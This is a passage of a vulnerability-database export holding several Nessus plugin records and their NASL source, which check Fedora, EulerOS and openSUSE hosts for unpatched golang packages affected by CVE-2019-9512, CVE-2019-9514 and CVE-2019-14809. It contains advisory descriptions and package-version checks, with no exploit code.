value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- Rebase to go1.11.13\n\n - Security fix for CVE-2019-9512, CVE-2019-9514 and\n CVE-2019-14809\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-65db7ad6c7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected golang package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-14809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:golang\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"golang-1.11.13-1.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"golang\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-02-10T14:50:54", "description": "According to the versions of the golang packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - Some HTTP/2 implementations are vulnerable to ping floods, potentially leading to a denial of service. The attacker sends continual pings to an HTTP/2 peer, causing the peer to build an internal queue of responses. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.(CVE-2019-9512)\n\n - Some HTTP/2 implementations are vulnerable to a reset flood, potentially leading to a denial of service. The attacker opens a number of streams and sends an invalid request over each stream that should solicit a stream of RST_STREAM frames from the peer. Depending on how the peer queues the RST_STREAM frames, this can consume excess memory, CPU, or both.(CVE-2019-9514)\n\n - net/url in Go before 1.11.13 and 1.12.x before 1.12.8 mishandles malformed hosts in URLs, leading to an authorization bypass in some applications. This is related to a Host field with a suffix appearing in neither Hostname() nor Port(), and is related to a non-numeric port number. For example, an attacker can compose a crafted javascript:// URL that results in a hostname of google.com.(CVE-2019-14809)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-30T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP8 : golang (EulerOS-SA-2019-2078)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14809", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:golang", "p-cpe:/a:huawei:euleros:golang-bin", "p-cpe:/a:huawei:euleros:golang-src", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-2078.NASL", "href": "https://www.tenable.com/plugins/nessus/129437", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(129437);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-14809\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"EulerOS 2.0 SP8 : golang (EulerOS-SA-2019-2078)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the golang packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - Some HTTP/2 implementations are vulnerable to ping\n floods, potentially leading to a denial of service. The\n attacker sends continual pings to an HTTP/2 peer,\n causing the peer to build an internal queue of\n responses. Depending on how efficiently this data is\n queued, this can consume excess CPU, memory, or\n both.(CVE-2019-9512)\n\n - Some HTTP/2 implementations are vulnerable to a reset\n flood, potentially leading to a denial of service. The\n attacker opens a number of streams and sends an invalid\n request over each stream that should solicit a stream\n of RST_STREAM frames from the peer. Depending on how\n the peer queues the RST_STREAM frames, this can consume\n excess memory, CPU, or both.(CVE-2019-9514)\n\n - net/url in Go before 1.11.13 and 1.12.x before 1.12.8\n mishandles malformed hosts in URLs, leading to an\n authorization bypass in some applications. This is\n related to a Host field with a suffix appearing in\n neither Hostname() nor Port(), and is related to a\n non-numeric port number. For example, an attacker can\n compose a crafted javascript:// URL that results in a\n hostname of google.com.(CVE-2019-14809)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2078\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3faa581d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected golang packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-14809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:golang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:golang-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:golang-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(8)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP8\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP8\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"golang-1.11-4.eulerosv2r8\",\n \"golang-bin-1.11-4.eulerosv2r8\",\n \"golang-src-1.11-4.eulerosv2r8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"8\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"golang\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-02-09T15:06:43", "description": "This update for go1.12 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2019-9512: Fixed HTTP/2 flood using PING frames that results in unbounded memory growth. (bsc#1146111)\n\n - CVE-2019-9514: Fixed HTTP/2 implementation is vulnerable to a reset flood, potentially leading to a denial of service. (bsc#1146115)\n\n - CVE-2019-14809: Fixed authorization bypass due to malformed hosts in URLs. (bsc#1146123)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-26T00:00:00", "type": "nessus", "title": "openSUSE Security Update : go1.12 (openSUSE-2019-2000) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14809", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:go1.12", "p-cpe:/a:novell:opensuse:go1.12-race", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2019-2000.NASL", "href": "https://www.tenable.com/plugins/nessus/128142", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-2000.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(128142);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-14809\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"openSUSE Security Update : go1.12 (openSUSE-2019-2000) (Ping Flood) (Reset Flood)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for go1.12 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2019-9512: Fixed HTTP/2 flood using PING frames that\n results in unbounded memory growth. (bsc#1146111)\n\n - CVE-2019-9514: Fixed HTTP/2 implementation is vulnerable\n to a reset flood, potentially leading to a denial of\n service. (bsc#1146115)\n\n - CVE-2019-14809: Fixed authorization bypass due to\n malformed hosts in URLs. (bsc#1146123)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1139210\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1141689\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1146111\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1146115\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1146123\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected go1.12 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-14809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:go1.12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:go1.12-race\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"go1.12-1.12.9-lp151.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"go1.12-race-1.12.9-lp151.2.9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"go1.12 / go1.12-race\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-02-10T14:51:37", "description": "This update for go1.12 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2019-9512: Fixed HTTP/2 flood using PING frames that results in unbounded memory growth (bsc#1146111).\n\n - CVE-2019-9514: Fixed HTTP/2 implementation that is vulnerable to a reset flood, potentially leading to a denial of service (bsc#1146115).\n\n - CVE-2019-14809: Fixed malformed hosts in URLs that leads to authorization bypass (bsc#1146123).\n\nBugfixes :\n\n - Update to go version 1.12.9 (bsc#1141689).\n\n - Adding Web Assembly stuff from misc/wasm (bsc#1139210).\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-03T00:00:00", "type": "nessus", "title": "openSUSE Security Update : go1.12 (openSUSE-2019-2056) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14809", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:go1.12", "p-cpe:/a:novell:opensuse:go1.12-race", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2019-2056.NASL", "href": "https://www.tenable.com/plugins/nessus/128462", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-2056.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(128462);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-14809\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"openSUSE Security Update : go1.12 (openSUSE-2019-2056) (Ping Flood) (Reset Flood)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for go1.12 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2019-9512: Fixed HTTP/2 flood using PING frames that\n results in unbounded memory growth (bsc#1146111).\n\n - CVE-2019-9514: Fixed HTTP/2 implementation that is\n vulnerable to a reset flood, potentially leading to a\n denial of service (bsc#1146115).\n\n - CVE-2019-14809: Fixed malformed hosts in URLs that leads\n to authorization bypass (bsc#1146123).\n\nBugfixes :\n\n - Update to go version 1.12.9 (bsc#1141689).\n\n - Adding Web Assembly stuff from misc/wasm (bsc#1139210).\n\nThis update was imported from the SUSE:SLE-15:Update update project.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1139210\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1141689\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1146111\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1146115\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1146123\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected go1.12 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-14809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:go1.12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:go1.12-race\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"go1.12-1.12.9-lp151.2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"go1.12-race-1.12.9-lp151.2.13.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"go1.12 / go1.12-race\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-02-09T15:10:50", "description": "This update for go1.12 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2019-9512: Fixed HTTP/2 flood using PING frames that results in unbounded memory growth (bsc#1146111).\n\n - CVE-2019-9514: Fixed HTTP/2 implementation that is vulnerable to a reset flood, potentially leading to a denial of service (bsc#1146115).\n\n - CVE-2019-14809: Fixed malformed hosts in URLs that leads to authorization bypass (bsc#1146123).\n\nBugfixes :\n\n - Update to go version 1.12.9 (bsc#1141689).\n\n - Adding Web Assembly stuff from misc/wasm (bsc#1139210).\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-16T00:00:00", "type": "nessus", "title": "openSUSE Security Update : go1.12 (openSUSE-2019-2130) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14809", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:go1.12", "p-cpe:/a:novell:opensuse:go1.12-race", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2019-2130.NASL", "href": "https://www.tenable.com/plugins/nessus/128863", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-2130.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(128863);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-14809\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"openSUSE Security Update : go1.12 (openSUSE-2019-2130) (Ping Flood) (Reset Flood)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for 